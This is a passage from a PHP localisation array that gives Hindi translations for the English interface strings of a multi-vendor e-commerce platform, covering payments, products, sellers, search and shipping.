'सांकेतिक शब्द मेल नहीं खाते', 'Passwords_match' => 'पासवर्ड का मेल', 'Pay_with_secure_Digital_payment_gateways' => 'सुरक्षित डिजिटल भुगतान गेटवे के साथ भुगतान करें', 'Payer Name' => 'अदाकार का नाम', 'Payment' => 'भुगतान', 'Payment Method' => 'भुगतान विधि', 'Payment Setup' => 'अदायगी सेटअप', 'Payment Statistics' => 'भुगतान सांख्यिकी', 'Payment Status' => 'भुगतान की स्थिति', 'Payment_Details' => 'भुगतान विवरण', 'Payment_History' => 'भुगतान इतिहास', 'Payment_Information' => 'भुगतान जानकारी', 'Payment_Method' => 'भुगतान विधि', 'Payment_Methods' => 'भुगतान की विधि', 'Payment_Note' => 'भुगतान नोट', 'Payment_Option' => 'भुगतान विकल्प', 'Payment_Statistics' => 'भुगतान सांख्यिकी', 'Payment_Status' => 'भुगतान की स्थिति', 'Payments' => 'भुगतान', 'Payments Amount' => 'भुगतान राशि', 'Paypal' => 'Paypal', 'Paypal_Client_ID' => 'पेपैल क्लाइंट आईडी', 'Pending' => 'लंबित', 'Pending Request' => 'लंबित अनुरोध', 'Pending Withdraws' => 'लंबित निकासी', 'Pending_Products' => 'लंबित उत्पाद', 'Pending_Refund_Requests' => 'लंबित धनवापसी अनुरोध', 'Pending_Withdraw' => 'लंबित निकासी', 'Pending_Withdraws' => 'लंबित निकासी', 'Percent' => 'प्रतिशत', 'Permanent' => 'स्थायी', 'Personal_Details' => 'व्यक्तिगत विवरण', 'Phone' => 'फ़ोन', 'Phone Case' => 'फोन का बक्सा', 'Phones & Telecom' => 'फ़ोन और दूरसंचार', 'Physical Product' => 'भौतिक उत्पाद', 'Pinterest' => 'Pinterest', 'Place_Order' => 'आदेश देना', 'Placeholder' => 'प्लेसहोल्डर', 'Please ReType Password' => 'कृपया पासवर्ड रिटाइप करें', 'Please check the recaptcha' => 'कृपया recaptcha की जाँच करें', 'Please choose all the options' => 'कृपया सभी विकल्प चुनें', 'Please enter valid email address' => 'कृपया सही ईमेल पता दें', 'Please enter your first name' => 'कृपया अपना पहला नाम दें', 'Please enter your last name' => 'कृपया अपना अंतिम नाम दर्ज करें', 'Please enter your phone number' => 'कृपया अपना फोन नंबर दर्ज करें', 'Please fill all required fields' => 'कृपया सभी आवश्यक फ़ील्ड भरें', 'Please fill all required fields of shipping address' => 'कृपया शिपिंग पते के सभी आवश्यक फ़ील्ड भरें', 'Please fill all required fields of shipping/billing address' => 'कृपया शिपिंग/बिलिंग पते के सभी आवश्यक फ़ील्ड भरें', 'Please fill all444 required fields' => 'कृपया ALL444 आवश्यक फ़ील्ड भरें', 'Please go back to the homepage' => 'कृपया होमपेज पर वापस जाएं', 'Please only input png or jpg type file' => 'कृपया केवल इनपुट PNG या JPG प्रकार फ़ाइल', 'Please provide valid email address' => 'कृपया मान्य ईमेल पता प्रदान करें', 'Please write the message' => 'कृपया संदेश लिखें', 'Please_ReType_Password' => 'कृपया पासवर्ड रिटाइप करें', 'Please_Verify_that_itâs_you' => 'कृपया सत्यापित करें कि यह आप है', 'Please_check_the_recaptcha' => 'कृपया recaptcha की जाँच करें', 'Please_confirm_your_verified_account_to_pay_through_your_bank_account' => 'कृपया अपने बैंक खाते के माध्यम से भुगतान करने के लिए अपने सत्यापित खाते की पुष्टि करें', 'Please_contact_with_deliveryman_to_confirm_your_pay_and_receive_your_order.' => 'कृपया अपने वेतन की पुष्टि करने और अपना आदेश प्राप्त करने के लिए डिलीवरीमैन के साथ संपर्क करें।', 'Please_enter_the_OTP_in_the_field_below_to_verify_your_email' => 'कृपया अपना ईमेल सत्यापित करने के लिए नीचे दिए गए फ़ील्ड में OTP दर्ज करें', 'Please_enter_the_OTP_in_the_field_below_to_verify_your_phone' => 'कृपया अपना फोन सत्यापित करने के लिए नीचे दिए गए फ़ील्ड में OTP दर्ज करें', 'Please_make_sure_all_the product s_delivery_charges_are_up_to_date.' => 'कृपया, सुनिश्चित करें कि सभी उत्पाद वितरण शुल्क अद्यतित हैं।', 'Please_send_a_Feedback' => 'कृपया एक प्रतिक्रिया भेजें', 'Please_type_verify_code' => 'कृपया सत्यापित करें कोड टाइप करें', 'Plese come back later' => 'बाद में वापस आओ', 'Point_Transaction_History' => 'बिंदु लेनदेन इतिहास', 'Poor' => 'गरीब', 'Popular_Tags' => 'प्रसिद्ध टग्स', 'Popup Banner' => 'पॉपअप बैनर', 'Popup_Banner' => 'पॉपअप बैनर', 'Popup_Banner_updated_Successfully' => 'पॉपअप बैनर को सफलतापूर्वक अपडेट किया गया', 'Portable Air Conditioner' => 'पोर्टेबल एयर कंडीशनर', 'Position' => 'पद', 'Positive' => 'सकारात्मक', 'Positive_Review' => 'सकारात्मक समीक्षा', 'Power supply unit' => 'बिजली आपूर्ति इकाई', 'Preparing Shipment' => 'शिपमेंट तैयार करना', 'Preparing_for_shipment' => 'शिपमेंट के लिए तैयारी', 'Press' => 'प्रेस', 'Press_Submit' => 'प्रेस सबमिट करें', 'Previous' => 'पहले का', 'Price' => 'कीमत', 'Price_Range' => 'मूल्य सीमा', 'Pricing_&_others' => 'मूल्य निर्धारण और अन्य', 'Primary' => 'प्राथमिक', 'Primary_Color' => 'प्राथमिक रंग', 'Primary_Light_Color' => 'प्राथमिक प्रकाश रंग', 'Print' => 'छाप', 'Print Invoice' => 'चालान छापें', 'Print invoice' => 'चालान छापें', 'Printer' => 'मुद्रक', 'Priority' => 'प्राथमिकता', 'Privacy Policy' => 'गोपनीयता नीति', 'Privacy policy' => 'गोपनीयता नीति', 'Privacy_Policy' => 'गोपनीयता नीति', 'Pro Plus 32 Inch Android Smart Wifi Hd Led Tv 4k Supported' => 'प्रो प्लस 32 इंच एंड्रॉइड स्मार्ट वाईफाई एचडी एलईडी टीवी 4K समर्थित', 'Proceed_To_Checkout' => 'चेक आउट करने के लिए आगे बढ़ें', 'Proceed_To_Next' => 'आगे बढ़ें', 'Proceed_to_Next' => 'आगे बढ़ें', 'Processing' => 'प्रसंस्करण', 'Proddduct 2' => 'Proddduct 2', 'Product' => 'उत्पाद', 'Product Add' => 'उत्पाद जोड़', 'Product Brand on/off' => 'उत्पाद ब्रांड चालू/बंद', 'Product Bulk Import' => 'उत्पाद थोक आयात', 'Product Discount' => 'उत्पाद छूट', 'Product Edit' => 'उत्पाद संपादन', 'Product ID is required!' => 'उत्पाद आईडी की आवश्यकता है!', 'Product Image' => 'उत्पाद का चित्र', 'Product List' => 'उत्पादों की सूची', 'Product Name' => 'प्रोडक्ट का नाम', 'Product Preview' => 'उत्पाद पूर्वावलोकन', 'Product Report' => 'उत्पाद रिपोर्ट', 'Product Review' => 'उत्पाद समीक्षा', 'Product Successfully Returned' => 'उत्पाद सफलतापूर्वक वापस आ गया', 'Product Type' => 'उत्पाद का प्रकार', 'Product Unit Price' => 'उत्पाद एकक मूल्य', 'Product added successfully!' => 'उत्पाद को सफलतापूर्वक जोड़ा गया!', 'Product already added in cart' => 'कार्ट में पहले से जोड़ा गया उत्पाद', 'Product already added to wishlist' => 'पहले से ही विशलिस्ट में जोड़ा गया उत्पाद', 'Product has been added to wishlist' => 'विशलिस्ट में उत्पाद जोड़ा गया है', 'Product images is required!' => 'उत्पाद छवियों की आवश्यकता है!', 'Product in Wishlist Report' => 'विशलिस्ट रिपोर्ट में उत्पाद', 'Product in wishlist report' => 'विशलिस्ट रिपोर्ट में उत्पाद', 'Product name is required!' => 'उत्पाद का नाम आवश्यक है!', 'Product price & stock' => 'उत्पाद मूल्य और स्टाक', 'Product reviews' => 'उत्पाद की समीक्षा', 'Product stock Report' => 'उत्पाद स्टॉक रिपोर्ट', 'Product stock report' => 'उत्पाद स्टॉक रिपोर्ट', 'Product thumbnail is required!' => 'उत्पाद थंबनेल की आवश्यकता है!', 'Product_Attributes' => 'उत्पाद विशेषताएं', 'Product_Brand' => 'उत्पाद का ब्रांड', 'Product_Comparison' => 'उत्पाद तुलना', 'Product_Details' => 'उत्पाद विवरण', 'Product_Discount' => 'उत्पाद छूट', 'Product_List' => 'उत्पादों की सूची', 'Product_List_Page' => 'उत्पाद सूची पृष्ठ', 'Product_Management' => 'उत्पाद प्रबंधन', 'Product_Name' => 'प्रोडक्ट का नाम', 'Product_Report' => 'उत्पाद रिपोर्ट', 'Product_Section' => 'उत्पाद अनुभाग', 'Product_Statistics' => 'उत्पाद सांख्यिकी', 'Product_Stock' => 'उत्पाद स्टॉक', 'Product_Successfully_Returned' => 'उत्पाद सफलतापूर्वक वापस आ गया', 'Product_Unit_Price' => 'उत्पाद एकक मूल्य', 'Product_has_been_added_to_Compare_list' => 'सूची की तुलना करने के लिए उत्पाद जोड़ा गया है', 'Product_must_be_approved' => 'उत्पाद को मंजूरी दी जानी चाहिए', 'Product_not_uploaded_yet' => 'उत्पाद अभी तक अपलोड नहीं किया गया है', 'Product_price_&_stock' => 'उत्पाद मूल्य और स्टाक', 'Product_quantity_can_not_be_zero_or_less_than_zero_in_cart' => 'उत्पाद की मात्रा शून्य या कार्ट में शून्य से कम नहीं हो सकती है', 'Product_quantity_can_not_be_zero_or_less_than_zero_in_cart!' => 'उत्पाद की मात्रा शून्य या कार्ट में शून्य से कम नहीं हो सकती है!', 'Product_quantity_updated' => 'अद्यतन उत्पाद मात्रा', 'Product_quantity_updated!' => 'उत्पाद की मात्रा अद्यतन!', 'Product_review_not_available' => 'उत्पाद की समीक्षा उपलब्ध नहीं है', 'Product_reviews' => 'उत्पाद की समीक्षा', 'Products' => 'उत्पादों', 'Products_Stock' => 'उत्पाद स्टाक', 'Profile' => 'प्रोफ़ाइल', 'Profile Settings' => 'पार्श्वचित्र समायोजन', 'Profile_Image' => 'प्रोफ़ाइल छवि', 'Profile_Info' => 'प्रोफ़ाइल जानकारी', 'Promo_Code' => 'प्रचार कोड', 'Promotion_Management' => 'पदोन्नति प्रबंधन', 'Promotional_Banners' => 'प्रचार बैनर', 'Provide' => 'उपलब्ध करवाना', 'Provide Primary Email and press' => 'प्राथमिक ईमेल प्रदान करें और दबाएं', 'Published' => 'प्रकाशित', 'Purchase' => 'खरीदना', 'Purchase price' => 'खरीद मूल्य', 'Purchase_price' => 'खरीद मूल्य', 'Purchese price' => 'क्रय -मूल्य', 'Push Messages' => 'पुश संदेश', 'Push Notification Setup' => 'धक्का अधिसूचना सेटअप', 'Push a description and also identifier and Continue' => 'एक विवरण और पहचानकर्ता को भी जारी रखें और जारी रखें', 'Push_Notification' => 'सर्वर पुश नोटीफिकेशन', 'Push_Notification_Setup' => 'धक्का अधिसूचना सेटअप', 'Put a description and also identifier (identifier that used for app) and this is the' => 'एक विवरण और पहचानकर्ता (पहचानकर्ता जो ऐप के लिए उपयोग किया जाता है) डालें और यह है', 'Q' => 'क्यू', 'QTY' => 'क्यूटी', 'Qty' => 'क्यूटी', 'Quantity' => 'मात्रा', 'Question' => 'सवाल', 'Quick' => 'जल्दी', 'Quick_Links' => 'त्वरित सम्पक', 'Quick_View' => 'त्वरित देखें', 'REVIEWS' => 'समीक्षाएं', 'RTL' => 'आरटीएल', 'Ranking' => 'श्रेणी', 'Rating' => 'रेटिंग', 'Ratings' => 'रेटिंग', 'Ratio' => 'अनुपात', 'Ratio_1=>1' => 'अनुपात 1=> 1', 'Re-Order_Level' => 'स्तर पुनः क्रमित करें', 'ReCAPTCHA Failed' => 'Recaptcha विफल रहा', 'ReCAPTCHA_Failed' => 'Recaptcha विफल रहा', 'Reached maximum' => 'अधिकतम पहुंच गया', 'Ready After Sell' => 'बेचने के बाद तैयार', 'Ready Product' => 'तैयार उत्पाद', 'Ready to Leave' => 'छोड़ने के लिए तैयार', 'Ready_After_Sell' => 'बेचने के बाद तैयार', 'Ready_Product' => 'तैयार उत्पाद', 'Recaptcha' => 'Recaptcha', 'Recommended' => 'अनुशंसित', 'Recommended_For_You' => 'आप के लिए अनुशंसित', 'Recommended_for_You' => 'आप के लिए अनुशंसित', 'Redirecting_to_the_payment' => 'भुगतान के लिए पुनर्निर्देशन', 'Redirecting_to_the_payment_page' => 'भुगतान पृष्ठ पर पुनर्निर्देशित करना', 'Refer_&_Earn' => 'देखें और अर्जित करना', 'Refer_Code' => 'कोड देखें', 'Reference' => 'संदर्भ', 'Refrigerator' => 'रेफ़्रिजरेटर', 'Refund' => 'धनवापसी', 'Refund Details' => 'वापसी विवरण', 'Refund Given' => 'दी गई रिफंड', 'Refund Policy' => 'भुगतान वापसी की नीति', 'Refund Rate' => 'धनवापसी दर', 'Refund request' => 'धन वापस करने का अनुरोध', 'Refund_Details' => 'वापसी विवरण', 'Refund_Given' => 'दी गई रिफंड', 'Refund_Order_Validity' => 'वापसी आदेश वैधता', 'Refund_Policy' => 'भुगतान वापसी की नीति', 'Refund_Request' => 'धन वापस करने का अनुरोध', 'Refund_Request_List' => 'रिफंड अनुरोध सूची', 'Refund_Requests' => 'रिफंड अनुरोध', 'Refund_Transactions' => 'वापसी लेनदेन', 'Refund_reason' => 'वापसी का कारण', 'Register' => 'पंजीकरण करवाना', 'Rejected' => 'अस्वीकार कर दिया', 'Remove' => 'निकालना', 'Remove_All' => 'सभी हटाएं', 'Removed' => 'निकाला गया', 'Reorder' => 'पुन=> व्यवस्थित करें', 'Repeat' => 'दोहराना', 'Reply_from_admin' => 'व्यवस्थापक से उत्तर दें', 'Report' => 'प्रतिवेदन', 'Report_&_Analytics' => 'रिपोर्ट और विश्लेषिकी', 'Reports' => 'रिपोर्टों', 'Reports_&_Analysis' => 'रिपोर्ट और विश्लेषण', 'Reports_&_Analytics' => 'रिपोर्ट और विश्लेषिकी', 'Request' => 'अनुरोध', 'Resend_OTP' => 'ओटीपी पुनः भेजें', 'Resend_code_within' => 'भीतर कोड को पुनरुत्थान करें', 'Reset' => 'रीसेट', 'Reset Your password' => 'अपना पासवर्ड रीसेट करें', 'Return Policy' => 'वापसी नीति', 'Return_Policy' => 'वापसी नीति', 'Returned' => 'लौटा हुआ', 'Review' => 'समीक्षा', 'Review List' => 'समीक्षा सूची', 'Review_list' => 'समीक्षा सूची', 'Reviewer' => 'आलोचक', 'Reviews' => 'समीक्षा', 'Right' => 'सही', 'Road' => 'सड़क', 'Role' => 'भूमिका', 'Role Update' => 'भूमिका अद्यतन', 'Role_Update' => 'भूमिका अद्यतन', 'Role_deleted_successfully' => 'भूमिका सफलतापूर्वक हटा दी गई', 'Router' => 'रूटर', 'Royal Crown' => 'शाही ताज', 'Running Shoes' => 'दौड़ने के जूते', 'SKU' => 'स्कू', 'SL' => 'क्र', 'SL#' => 'Sl#', 'SMS Module Setup' => 'एसएमएस मॉड्यूल सेटअप', 'SMS_Config' => 'एसएमएस कॉन्फ़िगर', 'SMS_Gateway_Title' => 'एसएमएस गेटवे शीर्षक', 'SMS_Module_Setup' => 'एसएमएस मॉड्यूल सेटअप', 'SMS_gateway_title' => 'एसएमएस गेटवे शीर्षक', 'SSD' => 'एसएसडी', 'SSLCOMMERZ' => 'Sslcommerz', 'SUPPORT TICKET ANSWER' => 'समर्थन टिकट उत्तर', 'Safe Payment' => 'सुरक्षित भुगतान', 'Sales Commission' => 'बिक्री पर कमीशन', 'Sales_&_Transaction_Report' => 'बिक्री और लेन -देन रिपोर्ट', 'Sales_Statistics' => 'बिक्री सांख्यिकी', 'Same_as_Delivery_Address' => 'डिलीवरी एड्रेस के रूप में भी', 'Save' => 'बचाना', 'Save Changes' => 'परिवर्तनों को सुरक्षित करें', 'Save changes' => 'परिवर्तनों को सुरक्षित करें', 'Save_This_Address' => 'इस पते को सहेजें', 'Save_this_Address' => 'इस पते को सहेजें', 'Saved Addresses' => 'पते बचाए गए', 'Saved_Addresses' => 'पते बचाए गए', 'Search' => 'खोज', 'Search Currency Name or Currency Code' => 'मुद्रा नाम या मुद्रा कोड खोजें', 'Search Data' => 'खोज डेटा', 'Search Product' => 'खोज उत्पाद', 'Search Product Name' => 'खोज उत्पाद का नाम', 'Search Products' => 'उत्पादों को खोजना', 'Search Ticket by Subject or status...' => 'विषय या स्थिति द्वारा खोज टिकट ...', 'Search by ID...' => 'आईडी द्वारा खोज ...', 'Search by Name' => 'नाम से खोजें', 'Search by Name or Email or Phone' => 'नाम या ईमेल या फोन से खोजें', 'Search by Name or Phone or Email' => 'नाम या फोन या ईमेल द्वारा खोजें', 'Search by Order ID' => 'आदेश आईडी द्वारा खोजें', 'Search by Product Name' => 'उत्पाद नाम से खोजें', 'Search by Product or Customer' => 'उत्पाद या ग्राहक द्वारा खोजें', 'Search by Sub Sub Category' => 'उप उप श्रेणी द्वारा खोजें', 'Search by Subject' => 'विषय द्वारा खोजें', 'Search by Title' => 'शीर्षक द्वारा खोजें', 'Search by Title or Code or Discount Type' => 'शीर्षक या कोड या छूट प्रकार द्वारा खोजें', 'Search by orders id' => 'आदेश आईडी द्वारा खोजें', 'Search by orders id _or_refund_id' => 'ऑर्डर आईडी या रिफंड आईडी द्वारा खोजें', 'Search by orders id or order_details_id' => 'ऑर्डर आईडी या ऑर्डर विवरण आईडी द्वारा खोजें', 'Search by orders id or transaction id' => 'ऑर्डर आईडी या लेनदेन आईडी द्वारा खोजें', 'Search by product name or bar code' => 'उत्पाद नाम या बार कोड द्वारा खोजें', 'Search by sores' => 'सोर्स द्वारा खोजें', 'Search here ...' => 'यहां तलाश करो ...', 'Search orders' => 'आदेशों को खोजें', 'Search products from this store' => 'इस स्टोर से उत्पाद खोजें', 'Search...' => 'खोज...', 'Search_Data' => 'खोज डेटा', 'Search_Method_Name' => 'खोज विधि नाम', 'Search_Product' => 'खोज उत्पाद', 'Search_Products' => 'उत्पादों को खोजना', 'Search_Store' => 'खोज भंडार', 'Search_by_Attribute_Name' => 'विशेषता नाम से खोजें', 'Search_by_Banner_Type' => 'बैनर प्रकार द्वारा खोजें', 'Search_by_Name' => 'नाम से खोजें', 'Search_by_Name_or_Category' => 'नाम या श्रेणी द्वारा खोजें', 'Search_by_Name_or_Mobile_No_or_Email' => 'नाम या मोबाइल नहीं या ईमेल द्वारा खोजें', 'Search_by_Order_ID_or_Transaction_ID' => 'ऑर्डर आईडी या लेनदेन आईडी द्वारा खोजें', 'Search_by_Sub_Category' => 'उप श्रेणी द्वारा खोजें', 'Search_by_Sub_Sub_Category' => 'उप उप श्रेणी द्वारा खोजें', 'Search_by_email' => 'ईमेल द्वारा खोजें', 'Search_by_order_id' => 'आदेश आईडी द्वारा खोजें', 'Search_by_order_id_or_order_details_id' => 'ऑर्डर आईडी या ऑर्डर विवरण आईडी द्वारा खोजें', 'Search_by_order_id_or_refund_id' => 'ऑर्डर आईडी या रिफंड आईडी द्वारा खोजें', 'Search_customers...' => 'खोज ग्राहक ...', 'Search_for_items' => 'वस्तुओं की खोज करें', 'Search_for_items_or_store' => 'आइटम या स्टोर के लिए खोजें', 'Second step' => 'दूसरा कदम', 'Secondary' => 'माध्यमिक', 'Secondary Color' => 'द्वितीयक रंग', 'Secondary_Banner_updated_Successfully' => 'माध्यमिक बैनर सफलतापूर्वक अपडेट किया गया', 'Secret' => 'गुप्त', 'Secret Covered in Sand Comic book pdf' => 'सैंड कॉमिक बुक पीडीएफ में सीक्रेट कवर किया गया', 'Secret Key' => 'गुप्त कुंजी', 'See the latest deals and exciting new offers' => 'नवीनतम सौदे और रोमांचक नए ऑफ़र देखें', 'See_All' => 'सभी देखें', 'See_Credential_Setup_Instructions' => 'क्रेडेंशियल सेटअप निर्देश देखें', 'See_Less' => 'कम देखना', 'See_More' => 'और देखें', 'See_all' => 'सभी देखें', 'Seen' => 'देखा', 'Select' => 'चुनना', 'Select Logout below if you are ready to end your current session' => 'यदि आप अपना वर्तमान सत्र समाप्त करने के लिए तैयार हैं, तो नीचे लॉगआउट का चयन करें', 'Select All' => 'सबका चयन करें', 'Select Country code' => 'देश कोड का चयन करें', 'Select Coupon Type' => 'कूपन प्रकार का चयन करें', 'Select Customer' => 'ग्राहक का चयन करें', 'Select Logout below if you are ready to end your current session' => 'यदि आप अपना वर्तमान सत्र समाप्त करने के लिए तैयार हैं, तो नीचे लॉगआउट का चयन करें', 'Select Product' => 'उत्पाद का चयन करें', 'Select Seller' => 'विक्रेता का चयन करें', 'Select Time Period' => 'समय अवधि का चयन करें', 'Select an app type' => 'एक ऐप प्रकार का चयन करें', 'Select an app type and press' => 'एक ऐप प्रकार का चयन करें और दबाएं', 'Select product' => 'उत्पाद का चयन करें', 'Select reCAPTCHA v2 as' => 'के रूप में recaptcha v2 का चयन करें', 'Select the' => 'का चयन करें', 'Select your desire category' => 'अपनी इच्छा श्रेणी का चयन करें', 'Select_All' => 'सबका चयन करें', 'Select_Category' => 'श्रेणी चुनना', 'Select_City' => 'शहर चुनें', 'Select_Country' => 'देश चुनें', 'Select_From_Saved' => 'सहेजे से चयन करें', 'Select_Logout_below_if_you_are_ready_to_end_your_current_session' => 'यदि आप अपना वर्तमान सत्र समाप्त करने के लिए तैयार हैं, तो नीचे लॉगआउट का चयन करें', 'Select_Payment_Method' => 'भुगतान का तरीका चुनें', 'Select_Withdraw_Method' => 'वापसी विधि का चयन करें', 'Select_coupon_bearer' => 'कूपन बियरर का चयन करें', 'Select_coupon_type' => 'कूपन प्रकार का चयन करें', 'Select_customer' => 'ग्राहक का चयन करें', 'Select_main_category' => 'मुख्य श्रेणी का चयन करें', 'Select_reCAPTCHA_v2_as_ReCAPTCHA_Type' => 'Recaptcha V2 को recaptcha प्रकार के रूप में चुनें', 'Seller' => 'विक्रेता', 'Seller Apply' => 'विक्रेता आवेदन', 'Seller Info' => 'विक्रेता जानकारी', 'Seller Information' => 'विक्रेता जानकारी', 'Seller List' => 'विक्रेता सूची', 'Seller Orders' => 'विक्रेता आदेश', 'Seller POS' => 'विक्रेता', 'Seller POS permission on/off' => 'विक्रेता पॉस की अनुमति पर/बंद', 'Seller Products' => 'विक्रेता उत्पाद', 'Seller Registration' => 'विक्रेता पंजीकरण', 'Seller Registration on/off' => 'विक्रेता पंजीकरण पर/बंद', 'Seller Reports' => 'विक्रेता रिपोर्ट', 'Seller Wallet Status' => 'विक्रेता बटुए की स्थिति', 'Seller product sale Report' => 'विक्रेता उत्पाद बिक्री रिपोर्ट', 'Seller product sale report' => 'विक्रेता उत्पाद बिक्री रिपोर्ट', 'Seller_Apply' => 'विक्रेता आवेदन', 'Seller_Details' => 'विक्रेता विवरण', 'Seller_Discount' => 'विक्रेता छूट', 'Seller_Earning' => 'विक्रेता कमाई', 'Seller_Image' => 'विक्रेता छवि', 'Seller_Info' => 'विक्रेता जानकारी', 'Seller_Information' => 'विक्रेता जानकारी', 'Seller_List' => 'विक्रेता सूची', 'Seller_Login' => 'विक्रेता लॉगिन', 'Seller_Net_Income' => 'विक्रेता शुद्ध आय', 'Seller_Order' => 'विक्रेता आदेश', 'Seller_POS_permission_on_or_off' => 'विक्रेता पीओएस पर या बंद अनुमति', 'Seller_Product_List' => 'विक्रेता उत्पाद सूची', 'Seller_Reg' => 'विक्रेता', 'Seller_Registration' => 'विक्रेता पंजीकरण', 'Seller_Wallet' => 'विक्रेता बटुआ', 'Seller_Wallet_Status' => 'विक्रेता बटुए की स्थिति', 'Seller_details' => 'विक्रेता विवरण', 'Seller_info' => 'विक्रेता जानकारी', 'Seller_registration' => 'विक्रेता पंजीकरण', 'Seller_request_for_open_a_shop.' => 'एक दुकान खोलने के लिए विक्रेता अनुरोध।', 'Sellers' => 'सभी विक्रेता', 'Send' => 'भेजना', 'Send a message' => 'एक संदेश भेजो', 'Send_Mail' => 'मेल भेजने', 'Send_Notification' => 'अधिसूचना भेजें', 'Send_Reply' => 'उत्तर भेजें', 'Send_your_wallet_money_while_order' => 'ऑर्डर करते समय अपना बटुआ पैसा भेजें', 'Sensitive_data! Make_sure_before_changing.' => 'संवेदनशील जानकारी! बदलने से पहले सुनिश्चित करें।', 'Server Key' => 'सर्वर कुंजी', 'Set Up' => 'स्थापित करना', 'Set_Delivery_Address' => 'वितरण पता सेट करें', 'Set_Form_Map' => 'फॉर्म मैप सेट करें', 'Set_Priority' => 'प्राथमिकता दर्ज करें', 'Set_from_map' => 'नक्शे से सेट करें', 'Setting' => 'सेटिंग', 'Settings' => 'समायोजन', 'Settings updated!' => 'सेटिंग को अद्यतन किया गया है!', 'Settings_updated' => 'सेटिंग को अद्यतन किया गया है', 'Setup' => 'स्थापित करना', 'Share' => 'शेयर करना', 'Shipping' => 'शिपिंग', 'Shipping Address Choose' => 'शिपिंग पता चुनें', 'Shipping Charge' => 'भेजने की लागत', 'Shipping Method' => 'शिपिंग का तरीका', 'Shipping Method Update' => 'शिपिंग विधि अद्यतन', 'Shipping Method deleted successfully' => 'शिपिंग विधि सफलतापूर्वक हटा दी गई', 'Shipping_Address' => 'शिपिंग पता', 'Shipping_And_Billing_Details' => 'शिपिंग और बिलिंग विवरण', 'Shipping_Charge' => 'भेजने की लागत', 'Shipping_Details' => 'शिपिंग की जानकारियां', 'Shipping_Fee' => 'शिपिंग शुल्क', 'Shipping_Method' => 'शिपिंग का तरीका', 'Shipping_Method_Select' => 'शिपिंग विधि का चयन करें', 'Shipping_and_billing' => 'नौवहन और बिलिंग', 'Shoes' => 'जूते', 'Shop' => 'दुकान', 'Shop Edit' => 'दुकान संपादित करना', 'Shop Name' => 'दुकान का नाम', 'Shop Page' => 'दुकान पृष्ठ', 'Shop info updated successfully!' => 'दुकान की जानकारी सफलतापूर्वक अपडेट की गई!', 'Shop name' => 'दुकान का नाम', 'Shop view' => 'दुकान का दृश्य', 'Shop_Again_From_Your_Recent_Store' => 'अपने हाल के स्टोर से फिर से खरीदारी करें', 'Shop_Info' => 'दुकान की जानकारी', 'Shop_Information' => 'दुकान की सूचना', 'Shop_Name' => 'दुकान का नाम', 'Shop_Now' => 'अभी खरीदें', 'Shop_Page' => 'दुकान पृष्ठ', 'Shop_cover_Image' => 'दुकान कवर छवि', 'Shop_wise_with' => 'के साथ खरीदारी करना', 'Shopping_And_Billing_Details' => 'खरीदारी और बिलिंग विवरण', 'Shopping_Details' => 'शॉपिंग विवरण', 'Short title' => 'छोटा शीर्षक', 'Show' => 'दिखाओ', 'Show data by date range' => 'दिनांक सीमा द्वारा डेटा दिखाएं', 'Show_Billing_Address_In_Checkout' => 'चेकआउट में बिलिंग पता दिखाएं', 'Show_Filter_Options' => 'फ़िल्टर विकल्प दिखाएं', 'Show_Order' => 'आदेश देना', 'Show_Order =>' => 'आदेश दिखाओ=>', 'Show_Order_=>' => 'आदेश दिखाओ=>', 'Show_Product' => 'उत्पाद दिखाएं', 'Show_as_featured' => 'शो के रूप में दिखाया गया', 'Sidebar Banner' => 'साइडबार बैनर', 'Sign out' => 'साइन आउट', 'Sign_In' => 'दाखिल करना', 'Sign_Out' => 'साइन आउट', 'Sign_Up' => 'साइन अप करें', 'Sign_in_First_to_Apply_Coupon' => 'कूपन लागू करने के लिए पहले साइन इन करें', 'Silicone Strap Analogue Sports Watch Rectangular Dial New Model 2023 Men Watches' => 'सिलिकॉन स्ट्रैप एनालॉग स्पोर्ट्स वॉच आयताकार डायल न्यू मॉडल 2023 पुरुष घड़ियों', 'Similar_Category_Product' => 'इसी तरह की श्रेणी उत्पाद', 'Similar_Product_from_This_Store' => 'इस स्टोर से इसी तरह का उत्पाद', 'Single_vendor' => 'एकल विक्रेता', 'Site Key' => 'कार्यस्थल की कुंजी', 'Site URL' => 'साइट URL', 'Size' => 'आकार', 'Smart Watch' => 'चतुर घड़ी', 'Smartphone' => 'स्मार्टफोन', 'Sneakers man new design fabrics shoes with high lace up design and rubber materi' => 'स्नीकर्स मैन नए डिजाइन कपड़े के जूते उच्च फीता अप डिजाइन और रबर मेटर के साथ', 'Social Link Is Requeired' => 'सामाजिक लिंक की आवश्यकता है', 'Social Login' => 'सामाजिक लॉगिन', 'Social Media' => 'सामाजिक मीडिया', 'Social Media Already taken' => 'सोशल मीडिया पहले से ही लिया गया', 'Social Media inserted Successfully' => 'सोशल मीडिया सफलतापूर्वक डाला गया', 'Social Name Is Requeired' => 'सामाजिक नाम की आवश्यकता है', 'Social info updated Successfully' => 'सामाजिक जानकारी सफलतापूर्वक अपडेट की गई', 'Social media deleted Successfully' => 'सोशल मीडिया सफलतापूर्वक हटा दिया गया', 'Social-Media-Chatting' => 'सोशल-मीडिया चैटिंग', 'Social_Media_Chat' => 'सोशल मीडिया चैट', 'Social_Media_Chatting' => 'सोशल मीडिया चैटिंग', 'Social_Media_Links' => 'सोशल मीडिया लिंक', 'Social_Media_Login' => 'सोशल मीडिया लॉगिन', 'Software version' => 'सॉफ्टवेयर संस्करण', 'Sold' => 'बिका हुआ', 'Something went wrong!' => 'कुछ गलत हो गया!', 'Soon_Stock_Out' => 'जल्द ही स्टॉक', 'Sorry' => 'क्षमा मांगना', 'Sorry product is out of stock.' => 'क्षमा करें उत्पाद स्टॉक से बाहर है।', 'Sorry product out of stock' => 'सॉरी उत्पाद स्टॉक से बाहर', 'Sorry stock limit exceeded' => 'क्षमा करें स्टॉक सीमा पार हो गई', 'Sorry the minimum order quantity does not match' => 'क्षमा करें, न्यूनतम ऑर्डर की मात्रा मेल नहीं खाती है', 'Sorry product out of stock' => 'सॉरी उत्पाद स्टॉक से बाहर', 'Sorry stock limit exceeded' => 'क्षमा करें स्टॉक सीमा पार हो गई', 'Sorry the minimum order quantity does not match' => 'क्षमा करें, न्यूनतम ऑर्डर की मात्रा मेल नहीं खाती है', 'Sorry the minimum value was reached' => 'क्षमा करें, न्यूनतम मूल्य पहुंच गया था', 'Sorry_Out_of_stock' => 'क्षमा करें स्टॉक से बाहर', 'Sorry_we_can`t_complete_your_order' => 'क्षमा करें, हम आपके आदेश को पूरा नहीं कर सकते', 'Sort' => 'क्रम से लगाना', 'Sort_by' => 'इसके अनुसार क्रमबद्ध करें', 'Standard_Delivery' => 'मानक वितरण', 'Start' => 'शुरू', 